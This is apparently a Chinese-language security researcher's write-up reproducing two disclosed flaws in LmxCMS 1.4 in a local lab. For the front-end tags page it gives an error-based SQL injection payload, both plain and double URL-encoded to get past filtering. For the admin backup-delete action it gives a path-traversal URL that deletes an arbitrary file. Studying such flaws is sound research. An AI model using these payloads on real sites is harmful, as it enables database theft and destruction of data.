梦想CMS(lmxcms)1.4 简要分析
环境搭建
参考: https://www.bilibili.com/video/BV12U4y1G7iV?t=30.9
源码: http://www.lmxcms.com/down/xitong/
CNVD-2019-05674-前台的SQL注入
https://www.cnvd.org.cn/flaw/show/CNVD-2019-05674
LmxCMS V1.4前台Ta***.cl***.php存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
指TagsAction.class.php
这里调用的是系统自己定义的p函数,在common.php中
但是这个p函数过滤的很严,所以考虑在p函数之外绕过
有效的有两个地方:
$name = string::delHtml($data['name']);
$name = urldecode($name);
关于这个delHtml:
调用了strip_tags
效果是:
echo strip_tags("selec<>t"); // select
跟进输出处:
还是添加echo $sql;
所以这里对应的是:/lmxcms1.4/?m=tags&name=a
由于这里有404,报了404之后会发生页面跳转,不方便观察:
由于这儿有Cookie,所以每次对源代码修改后都要重新抓包
payload:/lmxcms1.4/?m=tags&name=a
但是那个delHtml的效果并不好
接下来尝试利用urldecode
正常情况下:
a' or updatexml(0,concat(0x7e,version()),1)#
URL编码两次:
%25%36%31%25%32%37%25%32%30%25%36%66%25%37%32%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%32%38%25%32%39%25%32%39%25%32%63%25%33%31%25%32%39%25%32%33
然后传参:
CNVD-2020-59469-后台---文件删除
https://www.cnvd.org.cn/flaw/show/CNVD-2020-59469
BackdbAction.class.php:
跟进:
发现重写了unlink方法:
public static function unLink($path){
if($path == ROOT_PATH) return;
if(is_file($path)){
if(!@unlink($path)) rewrite::js_back('删除文件失败,请检查'.$path.'文件权限');
return true;
}
}
发现在其他文件中也有使用:
对应的是BasicAction.class.php
回到刚才的unlink:
但是这两个地方删除的文件的后缀都被限制了,一个是.zip,另一个是.sql
再找其他地方:
这个unLink($filepath);,$filename可控,可能是一个利用点,不过利用起来比较麻烦
还有一处:
默认放置位置在file/back目录下
在根目录下新建一个1.txt:
所以:
http://192.168.84.1:8081/lmxcms1.4/admin.php?m=backdb&a=delbackdb&filename=../../1.txt